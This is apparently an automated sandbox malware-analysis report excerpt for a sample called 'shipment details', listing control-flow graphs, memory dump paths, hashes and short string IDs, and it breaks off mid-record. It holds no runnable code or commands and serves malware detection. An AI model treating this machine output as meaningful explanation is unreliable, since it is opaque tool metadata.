                                                                                control_flow_graph 0 13376f1-1337725 1 1337b54-1337b58 0->1 2 133772b-133774e 0->2 3 1337b71-1337b7f 1->3 4 1337b5a-1337b6e 1->4 11 1337754-1337761 2->11 12 13377fc-1337800 2->12 8 1337b81-1337b96 3->8 9 1337bf0-1337c05 3->9 18 1337b98-1337b9b 8->18 19 1337b9d-1337baa 8->19 20 1337c07-1337c0a 9->20 21 1337c0c-1337c19 9->21 24 1337763-133776e 11->24 25 1337770 11->25 15 1337802-1337810 12->15 16 1337848-1337851 12->16 15->16 36 1337812-133782d 15->36 22 1337c67 16->22 23 1337857-1337861 16->23 26 1337bac-1337bed 18->26 19->26 27 1337c1b-1337c56 20->27 21->27 30 1337c6c-1337c9c 22->30 23->1 28 1337867-1337870 23->28 31 1337772-1337774 24->31 25->31 75 1337c5d-1337c64 27->75 34 1337872-1337877 28->34 35 133787f-133788b 28->35 63 1337cb5-1337cbc 30->63 64 1337c9e-1337cb4 30->64 31->12 38 133777a-13377dc 31->38 34->35 35->30 41 1337891-1337897 35->41 55 133783b 36->55 56 133782f-1337839 36->56 87 13377e2-13377f9 38->87 88 13377de 38->88 43 1337b3e-1337b42 41->43 44 133789d-13378ad 41->44 43->22 48 1337b48-1337b4e 43->48 53 13378c1-13378c3 44->53 54 13378af-13378bf 44->54 48->1 48->28 61 13378c6-13378cc 53->61 54->61 62 133783d-133783f 55->62 56->62 61->43 67 13378d2-13378e1 61->67 62->16 68 1337841 62->68 72 13378e7 67->72 73 133798f-13379ba call 1337538 * 2 67->73 68->16 77 13378ea-13378fb 72->77 91 13379c0-13379c4 73->91 92 1337aa4-1337abe 73->92 77->30 80 1337901-1337913 77->80 80->30 83 1337919-1337931 80->83 145 1337933 call 13380c9 83->145 146 1337933 call 13380d8 83->146 86 1337939-1337949 86->43 90 133794f-1337952 86->90 87->12 88->87 93 1337954-133795a 90->93 94 133795c-133795f 90->94 91->43 96 13379ca-13379ce 91->96 92->1 118 1337ac4-1337ac8 92->118 93->94 97 1337965-1337968 93->97 94->22 94->97 101 13379d0-13379dd 96->101 102 13379f6-13379fc 96->102 98 1337970-1337973 97->98 99 133796a-133796e 97->99 98->22 103 1337979-133797d 98->103 99->98 99->103 114 13379df-13379ea 101->114 115 13379ec 101->115 104 1337a37-1337a3d 102->104 105 13379fe-1337a02 102->105 103->22 106 1337983-1337989 103->106 108 1337a49-1337a4f 104->108 109 1337a3f-1337a43 104->109 105->104 107 1337a04-1337a0d 105->107 106->73 106->77 116 1337a0f-1337a14 107->116 117 1337a1c-1337a32 107->117 112 1337a51-1337a55 108->112 113 1337a5b-1337a5d 108->113 109->75 109->108 112->43 112->113 121 1337a92-1337a94 113->121 122 1337a5f-1337a68 113->122 123 13379ee-13379f0 114->123 115->123 116->117 117->43 119 1337b04-1337b08 118->119 120 1337aca-1337ad4 call 13363e0 118->120 119->75 130 1337b0e-1337b12 119->130 120->119 133 1337ad6-1337aeb 120->133 121->43 128 1337a9a-1337aa1 121->128 126 1337a77-1337a8d 122->126 127 1337a6a-1337a6f 122->127 123->43 123->102 126->43 127->126 130->75 132 1337b18-1337b25 130->132 136 1337b27-1337b32 132->136 137 1337b34 132->137 133->119 142 1337aed-1337b02 133->142 139 1337b36-1337b38 136->139 137->139 139->43 139->75 142->1 142->119 145->86 146->86
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                                                • API String ID: 0-1435242062
                                                                                • Opcode ID: a852aa6fb40840fceb8e2ece78cc68e61d67452700132fc4ff5da1a935ff59aa
                                                                                • Instruction ID: 7c0a94a7931645e22c53bbba36687bb2afc1e34cbc12c50e14173e3a14891136
                                                                                • Opcode Fuzzy Hash: a852aa6fb40840fceb8e2ece78cc68e61d67452700132fc4ff5da1a935ff59aa
                                                                                • Instruction Fuzzy Hash: 10127970A006098FDB29CF69D984AAEBBF6FF88318F148599E549DB361D730EC41CB54

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1985 1335f38-1335f5a 1986 1335f70-1335f7b 1985->1986 1987 1335f5c-1335f60 1985->1987 1990 1336023-133604f 1986->1990 1991 1335f81-1335f83 1986->1991 1988 1335f62-1335f6e 1987->1988 1989 1335f88-1335f8f 1987->1989 1988->1986 1988->1989 1993 1335f91-1335f98 1989->1993 1994 1335faf-1335fb8 1989->1994 1997 1336056-1336098 1990->1997 1992 133601b-1336020 1991->1992 1993->1994 1995 1335f9a-1335fa5 1993->1995 2066 1335fba call 1335f2a 1994->2066 2067 1335fba call 1335f38 1994->2067 1995->1997 1998 1335fab-1335fad 1995->1998 2017 13360cb-13360cf 1997->2017 2018 133609a-13360ae 1997->2018 1998->1992 1999 1335fc0-1335fc2 2000 1335fc4-1335fc8 1999->2000 2001 1335fca-1335fd2 1999->2001 2000->2001 2004 1335fe5-1336004 call 13369a0 2000->2004 2005 1335fe1-1335fe3 2001->2005 2006 1335fd4-1335fd9 2001->2006 2011 1336006-133600f 2004->2011 2012 1336019 2004->2012 2005->1992 2006->2005 2070 1336011 call 133aef0 2011->2070 2071 1336011 call 133aeba 2011->2071 2072 1336011 call 133afad 2011->2072 2012->1992 2014 1336017 2014->1992 2019 1336163-1336165 2017->2019 2020 13360d5-13360d9 2017->2020 2021 13360b0-13360b6 2018->2021 2022 13360bd-13360c1 2018->2022 2068 1336167 call 1336300 2019->2068 2069 1336167 call 13362f0 2019->2069 2023 13360db-13360e7 2020->2023 2024 13360e9-13360f6 2020->2024 2021->2022 2022->2017 2032 13360f8-1336102 2023->2032 2024->2032 2025 133616d-1336173 2026 1336175-133617b 2025->2026 2027 133617f-1336186 2025->2027 2030 13361e1-1336240 2026->2030 2031 133617d 2026->2031 2046 1336247-133625b 2030->2046 2031->2027 2035 1336104-1336113 2032->2035 2036 133612f-1336133 2032->2036 2044 1336123-133612d 2035->2044 2045 1336115-133611c 2035->2045 2037 1336135-133613b 2036->2037 2038 133613f-1336143 2036->2038 2040 1336189-13361da 2037->2040 2041 133613d 2037->2041 2038->2027 2042 1336145-1336149 2038->2042 2040->2030 2041->2027 2042->2046 2047 133614f-1336161 2042->2047 2044->2036 2045->2044 2047->2027 2066->1999 2067->1999 2068->2025 2069->2025 2070->2014 2071->2014 2072->2014
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Haq$Haq
                                                                                • API String ID: 0-4016896955
                                                                                • Opcode ID: 92c610a6dbec6f0f5d47b260e04b91af8b93d81c275296867f245a6445c0f12e
                                                                                • Instruction ID: 446206a14982181965687597f48f31b693438ff96e19700251d507cd94fc6eb3
                                                                                • Opcode Fuzzy Hash: 92c610a6dbec6f0f5d47b260e04b91af8b93d81c275296867f245a6445c0f12e
                                                                                • Instruction Fuzzy Hash: 0B91CC70704205AFDB159F28C854A6EBBB6BFC8308F148869E946CB396CF74CD46C795

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2073 1336498-13364a5 2074 13364a7-13364ab 2073->2074 2075 13364ad-13364af 2073->2075 2074->2075 2076 13364b4-13364bf 2074->2076 2077 13366c0-13366c7 2075->2077 2078 13364c5-13364cc 2076->2078 2079 13366c8 2076->2079 2080 13364d2-13364e1 2078->2080 2081 1336661-1336667 2078->2081 2083 13366cd-13366e0 2079->2083 2082 13364e7-13364f6 2080->2082 2080->2083 2084 1336669-133666b 2081->2084 2085 133666d-1336671 2081->2085 2093 133650b-133650e 2082->2093 2094 13364f8-13364fb 2082->2094 2091 13366e2-1336705 2083->2091 2092 1336718-133671a 2083->2092 2084->2077 2086 1336673-1336679 2085->2086 2087 13366be 2085->2087 2086->2079 2089 133667b-133667e 2086->2089 2087->2077 2089->2079 2095 1336680-1336695 2089->2095 2114 1336707-133670c 2091->2114 2115 133670e-1336712 2091->2115 2098 133672f-1336736 2092->2098 2099 133671c-133672e 2092->2099 2096 1336510-1336513 2093->2096 2097 133651a-1336520 2093->2097 2094->2097 2100 13364fd-1336500 2094->2100 2112 1336697-133669d 2095->2112 2113 13366b9-13366bc 2095->2113 2101 1336566-133656c 2096->2101 2102 1336515 2096->2102 2105 1336522-1336528 2097->2105 2106 1336538-1336555 2097->2106 2107 1336601-1336607 2100->2107 2108 1336506 2100->2108 2109 1336584-1336596 2101->2109 2110 133656e-1336574 2101->2110 2111 133662c-1336639 2102->2111 2116 133652a 2105->2116 2117 133652c-1336536 2105->2117 2143 133655e-1336561 2106->2143 2119 1336609-133660f 2107->2119 2120 133661f-1336629 2107->2120 2108->2111 2139 13365a6-13365c9 2109->2139 2140 1336598-13365a4 2109->2140 2126 1336576 2110->2126 2127 1336578-1336582 2110->2127 2137 133663b-133663f 2111->2137 2138 133664d-133664f 2111->2138 2121 13366af-13366b2 2112->2121 2122 133669f-13366ad 2112->2122 2113->2077 2114->2092 2115->2092 2116->2106 2117->2106 2124 1336613-133661d 2119->2124 2125 1336611 2119->2125 2120->2111 2121->2079 2130 13366b4-13366b7 2121->2130 2122->2079 2122->2121 2124->2120 2125->2120 2126->2109 2127->2109 2130->2112 2130->2113 2137->2138 2141 1336641-1336645 2137->2141 2142 1336653-1336656 2138->2142 2139->2079 2150 13365cf-13365d2 2139->2150 2148 13365f1-13365ff 2140->2148 2141->2079 2144 133664b 2141->2144 2142->2079 2145 1336658-133665b 2142->2145 2143->2111 2144->2142 2145->2080 2145->2081 2148->2111 2150->2079 2152 13365d8-13365ea 2150->2152 2152->2148
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ,aq$,aq
                                                                                • API String ID: 0-2990736959
                                                                                • Opcode ID: 93bc0d4d3cc5e053bb0bccd3b13bdabbf6b555ded3cf786d7d0f98dd662dfda8
                                                                                • Instruction ID: fd9f34eca31a1f784af2ecf067667a10a0ec3b0a104ec1162d3972890cc73120
                                                                                • Opcode Fuzzy Hash: 93bc0d4d3cc5e053bb0bccd3b13bdabbf6b555ded3cf786d7d0f98dd662dfda8
                                                                                • Instruction Fuzzy Hash: 6B81E0B0B00509EFDB14CF6DC485A6ABBB6FFC8268B148169D506D73A5DB31E901CB54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4']q$4']q
                                                                                • API String ID: 0-3120983240
                                                                                • Opcode ID: ce5b4a842005a55caa7cb4c14d58f868907994617a9cbbcac5fd6138946c77ce
                                                                                • Instruction ID: 37481df239bbad70566409f5048194dab22373213cf27d9f7c111eea4dc8d3f6
                                                                                • Opcode Fuzzy Hash: ce5b4a842005a55caa7cb4c14d58f868907994617a9cbbcac5fd6138946c77ce
                                                                                • Instruction Fuzzy Hash: 5C518E31700209DFDB05DB6DD884B6ABBEAEBC8318F148466E909CB356DBB5CC01C7A5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (o]q$(o]q
                                                                                • API String ID: 0-1858875562
                                                                                • Opcode ID: 48f3bba3660880bcf4da2e45b0d3635c67f8d01cd452127990ac39292038fbc9
                                                                                • Instruction ID: b8f7a5e627035c3834cbee395d3f5d15aaa622999ffaf0713b838e784b627e14
                                                                                • Opcode Fuzzy Hash: 48f3bba3660880bcf4da2e45b0d3635c67f8d01cd452127990ac39292038fbc9
                                                                                • Instruction Fuzzy Hash: FC41E031B402049FC708AB78DC147AEBBE6AFC8605F14486AE606D7395DE349C06C798
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Xaq$Xaq
                                                                                • API String ID: 0-1488805882
                                                                                • Opcode ID: b92475ab5d9d386deee8638de457561401c34741c73dd24725084d6ee9b31e37
                                                                                • Instruction ID: 81e107a4c39e4ead6da67d4a85dcc731f48d446b1857fe8d65958b9200424ca9
                                                                                • Opcode Fuzzy Hash: b92475ab5d9d386deee8638de457561401c34741c73dd24725084d6ee9b31e37
                                                                                • Instruction Fuzzy Hash: 09316C31B042694BDF194A7E49A827EAAEABFC4308F18C53DD803C7395DB75CC458359
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $]q$$]q
                                                                                • API String ID: 0-127220927
                                                                                • Opcode ID: 43bbf5cf632adc412fb5c4b168acfebc3bb37268f3f9ba496656b19acfce1b5a
                                                                                • Instruction ID: 6d096dd1453d64d464a006b8b99fa2ec6adb2117bfcf24403af68ba61375f4bd
                                                                                • Opcode Fuzzy Hash: 43bbf5cf632adc412fb5c4b168acfebc3bb37268f3f9ba496656b19acfce1b5a
                                                                                • Instruction Fuzzy Hash: 4E31B4303541018FDB2A9B2DEC5067E7B6BFFC4708B140A96F212CB392DA28CC448759
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LR]q
                                                                                • API String ID: 0-3081347316
                                                                                • Opcode ID: 941ca05f5f541bbac77fc5f5e71ad36e42946026bf4f3da3ec44ce53d3aaf25a
                                                                                • Instruction ID: 8f4813f9b71fb05da1151c7aa0ceb59bd4d65b687967dcdcf3936ed50cc5cf57
                                                                                • Opcode Fuzzy Hash: 941ca05f5f541bbac77fc5f5e71ad36e42946026bf4f3da3ec44ce53d3aaf25a
                                                                                • Instruction Fuzzy Hash: 5152E875E01219CFCB54EF68EA98B9DBBB2FB49301F1085A9D409A7358DB705E85CF80
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: LR]q
                                                                                • API String ID: 0-3081347316
                                                                                • Opcode ID: 18912103d1d6776de9a5a8342a1f8e53e786632848893866aa3ce98db3777459
                                                                                • Instruction ID: 550c9ad57fd81093d9a418de36f734dea47e8f8826cda46a0ae108c0011120aa
                                                                                • Opcode Fuzzy Hash: 18912103d1d6776de9a5a8342a1f8e53e786632848893866aa3ce98db3777459
                                                                                • Instruction Fuzzy Hash: 6152E875E01219CFCB54EF68EA98A9DBBB2FB49301F1085A9D409A7358DB705E85CF80
                                                                                APIs
                                                                                • LdrInitializeThunk.NTDLL(00000000), ref: 06BD9A6E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 90af4ee129571b6a79fcb1dd50ec02119d958f89f409bf64c86c0d31dc9d3989
                                                                                • Instruction ID: 1faf3958bd1d88a7c861445306b2400eaa8edddbff09b700a41d361ce5a5ef5c
                                                                                • Opcode Fuzzy Hash: 90af4ee129571b6a79fcb1dd50ec02119d958f89f409bf64c86c0d31dc9d3989
                                                                                • Instruction Fuzzy Hash: 43114FB5E011099FDB44EFA8D484AEDBBB5FF88315F5481A5E804EB246E730D941CB50
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3d5e7e2734613dfadbe11401afeac58ce73fa556af38089ced0b843559af60e8
                                                                                • Instruction ID: e48d9cba713f228af0a70e010363356d0e398dc3b36061f1371b02d29dc64404
                                                                                • Opcode Fuzzy Hash: 3d5e7e2734613dfadbe11401afeac58ce73fa556af38089ced0b843559af60e8
                                                                                • Instruction Fuzzy Hash: 8A12A9758B12529FE2513F21E9AC13EBB61FB5F723794AD40F10FC0A45AB7058688F62
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a5917b8c26e8eead16f35ec8fd3f5492c8314e1c61ce8d367196f70d6995f421
                                                                                • Instruction ID: 67f35b386a149f50f54ed6bdb36fc7e351eda0d44c641f038a3558e5fd0a5b22
                                                                                • Opcode Fuzzy Hash: a5917b8c26e8eead16f35ec8fd3f5492c8314e1c61ce8d367196f70d6995f421
                                                                                • Instruction Fuzzy Hash: 411299758B12529FE2513F21E9AC13EBB61FB5F727790AD40F10FC0A45AB7058688F62
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5ec3a8b1a8d968d051554de9e0c4afe4870f524ebd6bb822df2276abc391ff9d
                                                                                • Instruction ID: 0bf15a525e00a1b6ec063948a212ead0ce7cbe37d19b7d50a75b2a734dc45ec6
                                                                                • Opcode Fuzzy Hash: 5ec3a8b1a8d968d051554de9e0c4afe4870f524ebd6bb822df2276abc391ff9d
                                                                                • Instruction Fuzzy Hash: 3A81F331900605DFCB15CF2CC884AAABBFAEFC5328B54C666D95997352C331E812CBA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fc74156f7cbe33ccf677c46ce39bf571907e529e1cfdd56913f00f69cd6f98a4
                                                                                • Instruction ID: 3c98fd0413b862f01c40e7abfbb3028f0a8359218d7b051cbc64e2a407108aef
                                                                                • Opcode Fuzzy Hash: fc74156f7cbe33ccf677c46ce39bf571907e529e1cfdd56913f00f69cd6f98a4
                                                                                • Instruction Fuzzy Hash: 6A7148347006098FDB15DF6CC898AAE7BE6AF89208B1506E9F916DB3B1DB70DC41CB54
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7087bfc372cedc44ec43bcebe898ac450c13629e2be2a6d24704c5f80835669c
                                                                                • Instruction ID: 91bb0f6c4fbcc7e66b74009d06dc535e732df5701d96c9ab53fa9cc60220fd5f
                                                                                • Opcode Fuzzy Hash: 7087bfc372cedc44ec43bcebe898ac450c13629e2be2a6d24704c5f80835669c
                                                                                • Instruction Fuzzy Hash: AE512370D01218DFDB14DFA5E948AAEBBB6FF88304F208529D809AB365DB355946CF41
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e8855a664e691dd2971ca1c889501b7590996eefbc23df1a9bdeba8e50d4c1e1
                                                                                • Instruction ID: 30f9271369128d9f9cab2dfcf6f61da6dd1926b8919b77f91baeb0da447a3906
                                                                                • Opcode Fuzzy Hash: e8855a664e691dd2971ca1c889501b7590996eefbc23df1a9bdeba8e50d4c1e1
                                                                                • Instruction Fuzzy Hash: CE519274E01208DFDB58DFAAD58499DBBF2FF89310F248169E819AB365DB31A801CF40
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 30413c98157c02d64d82f9c66edd848b74aa5c98db40e12c299bef0f1270d768
                                                                                • Instruction ID: eecef943d4c79c805055341eebefafb7e7a81d95e60f46f0be41b53689d067dd
                                                                                • Opcode Fuzzy Hash: 30413c98157c02d64d82f9c66edd848b74aa5c98db40e12c299bef0f1270d768
                                                                                • Instruction Fuzzy Hash: 2551A875E01608CFCB48DFA9D58499DBBF2FF89315B208469E809AB364DB31A942CF54
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 68f0895c59e214e1ecbaa3cdc5bb7436a49b190aac75c7dd7e2eb1b2d9a27266
                                                                                • Instruction ID: 4061769c119ecd59a8c03358ca1a2a49022b37f36351fd1083c3b6765c8338eb
                                                                                • Opcode Fuzzy Hash: 68f0895c59e214e1ecbaa3cdc5bb7436a49b190aac75c7dd7e2eb1b2d9a27266
                                                                                • Instruction Fuzzy Hash: B5419031A04249DFCF12CFA8C844A9EBFB2AF85328F048555E995EB362D375E914CB54
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e36cb35ce2b59c67260b4445ad32b9506defacbf32b36596423eca736fb9bdfa
                                                                                • Instruction ID: 4b31cd550fc3f4bedd90140dd54f96a5a1930b3abf283e3e97d0f3bc73517951
                                                                                • Opcode Fuzzy Hash: e36cb35ce2b59c67260b4445ad32b9506defacbf32b36596423eca736fb9bdfa
                                                                                • Instruction Fuzzy Hash: F541F271A042499FCB11DF68C804BAAFBF6FB84308F04846AE915DB252D775DD45CBA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 45785d4d6bedee36a866de7907a2d6198a8e61161a6b59ca2000d490c68d4162
                                                                                • Instruction ID: 290baa171de6e343837fc7992b5e07bd911123f5c247c1fcff3dcc5dda6c3ef2
                                                                                • Opcode Fuzzy Hash: 45785d4d6bedee36a866de7907a2d6198a8e61161a6b59ca2000d490c68d4162
                                                                                • Instruction Fuzzy Hash: 8531A33160520AEFCF02AF64E854AAF7BB6FB88615F008419FA15C7394CB35CD61DB90
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d1f4a6e3dfd6876ad8ff77bca745d81f5c7d3ab10404cc4b4a804a146993f3b8
                                                                                • Instruction ID: 07e761f976d9fb764b4861bfb9e11caa6cb634ba5bc2b55cb78137d2201101d5
                                                                                • Opcode Fuzzy Hash: d1f4a6e3dfd6876ad8ff77bca745d81f5c7d3ab10404cc4b4a804a146993f3b8
                                                                                • Instruction Fuzzy Hash: 6721F2713002008BDB265B29C95463E768BAFC470CF1486BDF506EBBA9EE79CC42D385
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cea2831270ff99b77c21f05f77b381cbc6aab1ab8b0c78864fdec59a15153272
                                                                                • Instruction ID: dc714258a18c86200a271070e2b359861e1f7d9861c352d85a4d88b464925e24
                                                                                • Opcode Fuzzy Hash: cea2831270ff99b77c21f05f77b381cbc6aab1ab8b0c78864fdec59a15153272
                                                                                • Instruction Fuzzy Hash: 742138367045119FC7259B29D85853EBBA2FFC6769718856EE906CB7A4CF30CC02CB84
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e75eeef443c1fec2d676f6dd78d7e856d25cb71aae8f8e8b46549a1c7e227197
                                                                                • Instruction ID: 58ae2776738d778f4b0431449b8f77407976d1c92b7f540990f7f64187240d3c
                                                                                • Opcode Fuzzy Hash: e75eeef443c1fec2d676f6dd78d7e856d25cb71aae8f8e8b46549a1c7e227197
                                                                                • Instruction Fuzzy Hash: 3D21AF35A001199FCB15DF68D8409AF77A5EBDD3A8B20C419E80A9B340DB34EA47CBD2
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519278354.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_12dd000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 85cab4ab79e4417d435604e6f360365bf68b516018ea4e6466b92f6d69b79792
                                                                                • Instruction ID: c358684f851194683928ec8feececf6e03584708bb612969c330c31349c3b6a2
                                                                                • Opcode Fuzzy Hash: 85cab4ab79e4417d435604e6f360365bf68b516018ea4e6466b92f6d69b79792
                                                                                • Instruction Fuzzy Hash: C2316B7140D7C49FC7038B64C9A4701BF71EB47214F2985EBD9888F2A3C23A980ACB62
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519278354.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_12dd000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e863f58e6d3c9c7950a5bfe576c72a76ac996377a1b2bd28978ee375877d14d7
